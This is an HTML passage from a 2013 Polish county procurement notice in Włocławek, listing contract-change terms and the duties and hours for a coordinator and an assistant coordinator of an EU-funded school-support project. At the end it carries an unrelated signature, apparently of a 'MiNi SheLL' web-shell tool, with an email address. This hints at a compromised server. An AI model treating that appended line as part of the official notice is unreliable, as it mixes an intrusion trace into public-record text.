<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ust. 1 ustawy, przewiduje możliwość dokonania zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy (w formie aneksu). 
1.	Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
2)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zleceniodawcą a inną niż Zleceniobiorca stroną, w szczególności instytucją Zarządzającą, Pośredniczącą I i II stopnia, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia;
3)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia, w szczególności w zakresie sprawozdawczości;
4)	gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji zamówienia;
5)	Zleceniobiorca może dokonać zmiany osoby pełniącej funkcję koordynatora projektu przedstawionego w ofercie, jedynie za uprzednią pisemną zgodą Zleceniodawcy, akceptującego nowego koordynatora projektu, ale nowy koordynator musi spełniać wymagania określone dla dotychczasowego;
6)	Zleceniobiorca z własnej inicjatywy proponuje zmianę koordynatora projektu w następujących przypadkach: śmierci, dłuższej choroby lub innych zdarzeń losowych; jeżeli zmiana koordynatora stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Zleceniobiorcy (np. rezygnacji, itp.)
7)	zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a)	gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży 
w interesie Zleceniodawcy, 
b)	działania siły wyższej, uniemożliwiającego wykonanie zamówienia 
w określonym pierwotnie terminie,
c)	w przypadku wystąpienia obiektywnych czynników niezależnych od Zleceniodawcy i Zleceniobiorcy.
2.	Zmiany umowy przewidziane wyżej dopuszczalne są na następujących warunkach:
1)	zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zleceniodawcy;
2)	w zakresie nie powodującym zwiększenia wynagrodzenia Zleceniobiorcy określonego w niniejszej umowie;
3)	na osoby o kwalifikacjach równorzędnych lub wyższych do kwalifikacji, które podlegały ocenie.
3.	Wszelkie zmiany umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.wloclawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe we Włocławku, ul. Cyganka Nr 28, 87-800 Włocławek, w pokoju nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2013 godzina 09:00, miejsce: Starostwo Powiatowe we Włocławku, ul. Cyganka Nr 28, 87-800 Włocławek, w pokoju nr 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: -Kompleksowe wspomaganie rozwoju szkół i przedszkoli w powiecie włocławskim-, współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu III -Wysoka jakość systemu oświaty-, Działania 3.5 - Kompleksowe wspomaganie rozwoju szkół, w ramach typu projektu: programy kompleksowego wspomagania szkół oraz przedszkoli.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji Koordynatora Projektu pn.: -Kompleksowe wspomaganie rozwoju szkół i przedszkoli w powiecie włocławskim-.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu części zamówienia:
1) Do zadań i obowiązków Koordynatora Projektu należeć będzie w szczególności:
- terminowe i właściwe realizowanie całości projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach;
- nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem;
- kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i EFS;
- nadzorowanie bieżących postępów w realizacji projektu;
- nadzór nad całością prac związanych z realizacją projektu i ich jakością;
- koordynacja działań merytorycznych i logistycznych związanych z projektem;
- utrzymywanie stałych kontaktów z opiekunami projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów;
- akceptacja korespondencji związanej z projektem do Instytucji Pośredniczącej;
- planowanie działań i wywiązywanie się ze wskaźników;
- kierowanie bieżącymi sprawami związanymi z realizacją projektu;
- poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu;
- współpraca z SORE i koordynatorami sieci  w zakresie przygotowania szczegółowych programów i terminów zajęć oraz ich akceptacja;
- akceptacja ankiet ewaluacyjnych dla potrzeb ewaluacji;
- nadzór na monitoringiem i ewaluacją projektu oraz jego promocja;
- kontrola bieżącej sprawozdawczości (merytorycznej i finansowej) realizacji Projektu;
- udział merytoryczny w terminowym przygotowaniu wniosków o płatność wraz z załącznikami, oraz ich akceptacja;
- przygotowanie i archiwizacja dokumentacji projektowej;
- bieżący monitoring i kontrola realizacji zadań w projekcie;
- weryfikacja i akceptacja zbiorczych arkuszy PEFS;
- sporządzanie projektów umów cywilno-prawnych;
- powoływanie komisji rekrutacyjnej;
- akceptacja planu pracy komisji rekrutacyjnej i regulaminu rekrutacji uczestników w projekcie;
- podejmowanie niezbędnych działań mających na celu osiągnięcie wskaźników rezultatu projektu;
- informowanie zamawiającego o wszelkich nieprawidłowościach związanych z realizacją projektu;
- udział w szkoleniach organizowanych przez ORE   z zakresu realizacji projektu;
- przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu;
- przygotowanie, koordynowanie i nadzorowanie prac związanych z promocją, ewaluacją, realizacją oraz rozliczeniem projektu;
- przygotowanie upoważnień do przetwarzania danych osobowych dla personelu projektu oraz zgłoszenie ich do rejestru upoważnień obowiązujących w Starostwie Powiatowym; 
- przestrzeganie procedur związanych z ochroną danych osobowych uczestników projektu, personelu;
- organizowanie spotkań monitorujących z pracownikami projektu oraz dyrektorami szkół uczestniczących w projekcie;
- zgłaszanie do ORE w Warszawie wszelkich zmian w realizacji i w budżecie projektu, przygotowywanie formularzy zmian merytorycznych i budżetowych;
- prowadzenie kontroli realizacji działań oraz nadzór nad monitoringiem wykorzystania materiałów do części praktycznych  zakupionych w ramach projektu;
- zorganizowanie biura projektu zgodnie z założeniami i wytycznymi (zakupy, oznakowanie);
- zapewnienie właściwego przepływu informacji pomiędzy pracownikami projektu;
- nadzór nad prowadzeniem bazy danych PEFS; 
- akceptacja zapotrzebowań na materiały biurowe i dydaktyczne;
- przygotowanie opisu przedmiotu zamówienia w części dotyczącej usług i oszacowania wartości zamówienia;
- przygotowanie, prowadzenie oraz uczestniczenie we wszystkich czynnościach przewidzianych w procedurze zamówień publicznych na dostawy oraz usługi przewidziane w budżecie projektu zgodnie z ustawą Prawo zamówień publicznych wraz z dokumentowaniem postępowań. Praca w Komisjach Przetargowych powołanych do przeprowadzenia postępowań w związku z zastosowaniem ustawy Pzp przy realizacji zadań projektowych; 
- nadzór nad prawidłową realizacją umów na świadczenie usług oraz dostawy, zawartych w ramach postępowań o udzielenie zamówienia publicznego; 
- śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie w celu zapewnienia zgodności projektu z wytycznymi, jak również prawem RP i UE;
- nadzorowanie bieżących postępów realizacji projektu i ich jakością;
- nadzorowanie prawidłowego przeprowadzenia promocji projektu;
- zatwierdzanie planów pracy dla poszczególnych działań projektowych;
- przydzielanie i koordynowanie zadań dla wszystkich osób zaangażowanych w realizację projektu; 
- kontrola jakości realizacji zadań pod kątem osiągnięcia założonych wskaźników i jego wykonanie;
- akceptacja wniosków o płatność i terminowym ich przekazaniem Instytucji Pośredniczącej oraz sprawozdań rzeczowych z postępów realizacji projektu, w tym sporządzenie ostatniego wniosku o płatność zgodnie obowiązującymi dokumentami programowymi i aktualnymi wytycznymi Instytucji Pośredniczącej; 
- obecność podczas kontroli projektu;
- zatwierdzanie pod względem merytorycznym dokumentów, które powstały w projekcie;
- inne zadania niezbędne do prawidłowej realizacji projektu nie wymienione wyżej a zlecone przez Zamawiającego.
2) Przedmiot zamówienia realizowany będzie w Wydziale Rozwoju, Edukacji i Spraw Społecznych Starostwa Powiatowego we Włocławku, ul. Cyganka 28 oraz w miarę potrzeb w szkołach wdrażających projekt.
 3) Łączny wymiar zaangażowania koordynatora projektu w realizację zadań we wszystkich projektach NSRO nie może przekraczać 176 godzin miesięcznie, łącznie 
z  zaangażowaniem do niniejszego projektu 80 godzin miesięcznie.
4) Koordynator projektu nie może być zatrudniony w instytucji  uczestniczącej 
w realizacji PO KL na podstawie stosunku pracy, chyba, że nie zachodzi konflikt interesów 
i podwójne finansowanie.
5) W przypadku wykonywania zadań w więcej niż w jednym projekcie, w ramach Narodowych Strategicznych Ram Odniesienia (NSRO), Zleceniobiorca jest zobowiązany do prowadzenia i udostępniania Zleceniodawcy - w okresie realizacji zadań w ramach projektu - ewidencji godzin i zadań realizowanych w ramach wszystkich projektów NSRO, w której Zleceniobiorca jest zaangażowany. Ewidencja powinna być prowadzona miesięcznie i przekazywana Zleceniodawcy w terminie do 5 dni kalendarzowych od ostatniego dnia poprzedniego miesiąca. 
6) Koordynator będzie wykonywał  przedmiot zamówienia w wymiarze 80 godzin miesięcznie w dniach od poniedziałku do piątku (od 1 do 8 godzin dziennie - codziennie w zależności od natężenia zadań), w Wydziale Rozwoju, Edukacji i Spraw Społecznych Starostwa Powiatowego we Włocławku, ul. Cyganka 28 oraz w miarę potrzeb w szkołach wdrażających projekt. Zleceniodawca w sytuacjach takich jak m.in. choroba, zdarzenie losowe czy zaplanowany urlop osoby wykonującej przedmiot umowy dopuszcza możliwość odstąpienia od obowiązku codziennej pracy w wskazanym miejscu pod warunkiem poinformowania o tym fakcie Zleceniodawcy oraz pod warunkiem wywiązania się Zleceniobiorcy z obowiązku realizacji 80 godzin pracy miesięcznie. Rozliczenie wymiaru godzinowego pracy w projekcie odbywać się będzie miesięcznie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.50.00.00-9, 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji Asystenta Koordynatora Projektu pn.: -Kompleksowe wspomaganie rozwoju szkół i przedszkoli w powiecie włocławskim-.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu części zamówienia:
1) Do zadań i obowiązków Asystenta Koordynatora Projektu należeć będzie w szczególności:
- terminowe i właściwe realizowanie całości projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach;
- przygotowywanie opisu przedmiotu zamówienia w części dotyczących zakupów na potrzeby realizacji projektu oraz oszacowanie ich wartości zamówienia;
- kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i EFS;
- nadzorowanie bieżących postępów w realizacji projektu;
- nadzór nad całością prac związanych z realizacją projektu i ich jakością;
- Koordynacja działań merytorycznych i logistycznych związanych z projektem;
- utrzymywanie stałych kontaktów z opiekunami projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów;
- przygotowanie korespondencji związanej z projektem do Instytucji Pośredniczącej;
- planowanie działań i wywiązywanie się ze wskaźników;
- kierowanie bieżącymi sprawami związanymi z realizacją projektu;
- poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu;
- współpraca z SORE i koordynatorami sieci  w zakresie przygotowania szczegółowych programów i terminów zajęć;
- opracowanie wzoru ankiet ewaluacyjnych dla potrzeb ewaluacji;
- nadzór na monitoringiem i ewaluacją projektu oraz jego promocja;
- kontrola bieżącej sprawozdawczości (merytorycznej i finansowej) realizacji Projektu;
- udział merytoryczny w terminowym przygotowaniu wniosków o płatność wraz z załącznikami;
- przygotowanie i archiwizacja dokumentacji projektowej;
- bieżący monitoring i kontrola realizacji zadań w projekcie;
- sporządzanie zbiorczych arkuszy PEFS;
- opracowanie planu pracy komisji rekrutacyjnej;
- przygotowanie, prowadzenie oraz uczestniczenie we wszystkich czynnościach przewidzianych w procedurze zamówień publicznych na dostawy oraz usługi przewidziane w budżecie projektu zgodnie z ustawą Prawo zamówień publicznych wraz z dokumentowaniem postępowań. Praca w Komisjach Przetargowych powołanych do przeprowadzenia postępowań w związku z zastosowaniem ustawy Pzp przy realizacji zadań projektowych;
- obecność podczas kontroli projektu;
- inne zadania niezbędne do prawidłowej realizacji projektu nie wymienione wyżej, a zlecone przez zamawiającego;
- pełnienie zadań koordynatora podczas jego nieobecności.
2) Przedmiot umowy realizowany będzie w Wydziale Rozwoju, Edukacji i Spraw Społecznych Starostwa Powiatowego we Włocławku, ul. Cyganka 28 oraz w miarę potrzeb w szkołach wdrażających projekt. 
3) Łączny wymiar zaangażowania asystenta koordynatora projektu w realizację zadań we wszystkich projektach NSRO nie może przekraczać 176 godzin miesięcznie, łącznie 
z  zaangażowaniem do niniejszego projektu 60 godzin miesięcznie.
4) Asystent koordynatora projektu nie może być zatrudniony w instytucji  uczestniczącej 
w realizacji PO KL na podstawie stosunku pracy, chyba, że nie zachodzi konflikt interesów i podwójne finansowanie.
5) W przypadku wykonywania zadań w więcej niż w jednym projekcie, w ramach Narodowych Strategicznych Ram Odniesienia (NSRO), Zleceniobiorca jest zobowiązany do prowadzenia i udostępniania Zleceniodawcy - w okresie realizacji zadań w ramach projektu - ewidencji godzin i zadań realizowanych w ramach wszystkich projektów NSRO, w której Zleceniobiorca jest zaangażowany. Ewidencja powinna być prowadzona miesięcznie i przekazywana Zleceniodawcy w terminie do 5 dni kalendarzowych od ostatniego dnia poprzedniego miesiąca. 
6) Asystent koordynatora będzie wykonywał  przedmiot zamówienia w wymiarze 60 godzin miesięcznie w dniach od poniedziałku do piątku (od 1 do 8 godzin dziennie - codziennie w zależności od natężenia zadań), w Wydziale Rozwoju, Edukacji i Spraw Społecznych Starostwa Powiatowego we Włocławku, ul. Cyganka 28 oraz w miarę potrzeb w szkołach wdrażających projekt. Zleceniodawca w sytuacjach takich jak m.in. choroba, zdarzenie losowe czy zaplanowany urlop osoby wykonującej przedmiot umowy dopuszcza możliwość odstąpienia od obowiązku codziennej pracy w wskazanym miejscu pod warunkiem poinformowania o tym fakcie Zleceniodawcy oraz pod warunkiem wywiązania się Zleceniobiorcy z obowiązku realizacji 60 godzin pracy miesięcznie. Rozliczenie wymiaru godzinowego pracy w projekcie odbywać się będzie miesięcznie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 79.50.00.00-9, 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com